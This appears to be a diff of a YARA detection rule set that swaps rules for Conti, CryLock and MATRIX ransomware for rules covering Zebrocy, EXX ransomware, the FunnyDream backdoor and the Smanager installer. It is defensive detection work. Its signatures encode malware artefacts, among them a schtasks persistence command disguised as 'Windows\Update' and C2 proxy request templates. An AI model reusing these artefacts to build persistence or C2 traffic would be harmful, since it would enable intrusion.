+		$c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b }
+		$c2 = { 52 90 4e 54 46 53 }
+		$c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 }
+		$c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 }
+		$c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 }
+		$c6 = { 46 49 4c 45 30 00 03 00 8? ?d }
+		$c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 }
+		$s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 }
+		$s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 }
+		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c }
+		$s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 }
+		$s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 }
+		$s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 }
+		$s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 }
+		$s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 }
+		$s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 }
+		$s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 }
+		$s11 = { 2f 2f 3a 70 74 74 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
+		uint16( 0 ) == 0x33c0 and filesize > 40KB and 5 of ( $c* ) and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot"
+		description = "Detect Zebrocy Go downloader (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "661182f7-4716-50d1-8d98-9fb272cf43eb"
-		date = "2021-05-19"
-		modified = "2021-05-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18"
+		id = "114c0297-7168-5d20-b56b-89b0b47f18c7"
+		date = "2020-12-09"
+		modified = "2020-12-10"
+		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65"
 		license_url = "N/A"
-		logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5"
+		logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9"
 		score = 50
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "Redacted"
-		tlp = "White"
-		adversary = "RAAS"
-		level = "Experimental"
+		level = "experimental"
+		hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19"
+		hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662"
 
 	strings:
-		$seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 }
-		$seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 }
-		$seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff }
-		$seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 }
+		$c1 = "os.(*ProcessState).sys" fullword ascii
+		$c2 = "os/exec.(*ExitError).Sys" fullword ascii
+		$c3 = "os/exec.ExitError.Sys" fullword ascii
+		$c4 = "os.(*ProcessState).Sys" fullword ascii
+		$p1 = "syscall.CreatePipe" fullword ascii
+		$p2 = "os.Pipe" fullword ascii
+		$p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 }
+		$p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 }
+		$op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b }
+		$op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 }
+		$op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 }
+		$op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 }
+		$op5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
+		$op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and all of ( $seq* )
+		uint16( 0 ) == 0x4d5a and filesize > 800KB and ( pe.imphash ( ) == "91802a615b3a5c4bcc05bc5f66a5b219" ) and 3 of ( $c* ) and 3 of ( $p* ) and 3 of ( $op* )
 }
-rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE
+rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect unpacked Conti ransomware (May 2021)"
+		description = "Detect EXX variant ELF ransomware"
 		author = "Arkbird_SOLG"
-		id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e"
-		date = "2021-05-20"
-		modified = "2021-05-21"
+		id = "fe85d480-317a-51c3-a817-fc9034e2944f"
+		date = "2020-12-09"
+		modified = "2020-12-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28"
 		license_url = "N/A"
-		logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41"
-		score = 75
-		quality = 75
+		logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085"
+		score = 50
+		quality = 73
 		tags = "FILE"
-		hash1 = "Redacted"
-		hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266"
-		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
-		hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2"
+		level = "experimental"
+		hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849"
 
 	strings:
-		$seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 }
-		$seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b }
-		$seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff }
-		$seq4 = { 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e }
-		$seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b }
-		$seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c }
+		$dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a }
+		$dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 }
+		$dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a }
+		$dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a }
+		$lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii
+		$lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii
+		$lib3 = "mbedtls_rsa_import" fullword ascii
+		$lib4 = "mbedtls_rsa_export" fullword ascii
+		$lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii
+		$lib6 = "mbedtls_sha256_process" fullword ascii
+		$seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb }
+		$seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff }
+		$seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 5 of ( $seq* )
+		uint16( 0 ) == 0x457f and filesize > 80KB and 3 of ( $dbg* ) and 4 of ( $lib* ) and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect CryLock ransomware V2.0.0"
+		description = "Detect backdoor used by FunnyDream (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0"
-		date = "2020-10-14"
-		modified = "2020-10-15"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31"
+		id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230"
+		logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199"
 		score = 75
-		quality = 71
+		quality = 67
 		tags = "FILE"
-		hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831"
+		hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529"
 
 	strings:
-		$s1 = "All commands sended to execution" fullword ascii
-		$s2 = "Processesblacklist1" fullword ascii
-		$s3 = "Execute all" fullword ascii
-		$s4 = "config.txt" fullword ascii
-		$debug1 = "Processed files: " fullword ascii
-		$debug2 = "Next -->" fullword ascii
-		$debug3 = "Status: scan network" fullword ascii
-		$debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
-		$debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 }
-		$debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 }
-		$ran1 = "w_to_decrypt.hta" wide
-		$ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii
-		$ran3 = "<%START_DATETIME%>" fullword ascii
-		$ran4 = "<%MAIN_CONTACT%>" fullword ascii
-		$ran5 = "<%RESERVE_CONTACT%>" fullword ascii
-		$ran6 = "<%HID%>" fullword ascii
+		$s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 }
+		$s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 }
+		$s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 }
+		$s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 }
+		$s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a }
+		$s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 }
+		$s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 }
+		$s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 }
+		$s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 }
+		$s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* ) and 4 of ( $debug* ) and 4 of ( $ran* )
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 6 of them
 }
-rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE
+rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect MATRIX ransomware"
+		description = "Detect installer module of Smanager (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "a7df188c-e381-55e6-97e6-45f5830ff0d3"
-		date = "2020-10-15"
-		modified = "2020-10-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28"
+		id = "364285bc-2173-5ff0-85d2-af06051a3b70"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_Smanager_Installer_Module_Nov_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3"
+		logic_hash = "380d28f6cdea24f807f3c29207eb0b8888ebdfea215c53df164fe080c3917438"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf"
-		hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40"
-		hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829"
-		hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6"
+		hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c"
 
 	strings:
-		$debug1 = "[LDRIVES]: not found!" fullword wide
-		$debug2 = "[DONE]: NO_SHARES!" fullword wide
-		$debug3 = "[ALL_LOCAL_KID]: " fullword wide
-		$debug4 = "[FINISHED]: G=" fullword wide
-		$debug5 = "[FEX_START]" fullword wide
-		$debug6 = "[LOGSAVED]" fullword wide
-		$debug7 = "[GENKEY]" fullword wide
-		$debug8 = "[SHARES]" fullword wide
-		$debug9 = "[SHARESSCAN]: " fullword wide
-		$reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d }
-		$reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d }
-		$reg3 = { 26 00 73 00 69 00 64 00 3d 00 }
-		$reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d }
-		$reg5 = { 47 00 45 00 54 }
+		$s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 }
+		$s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 }
+		$s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 }
+		$s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 }
+		$s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c }
+		$s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 }
+		$s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c }
+		$s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c }
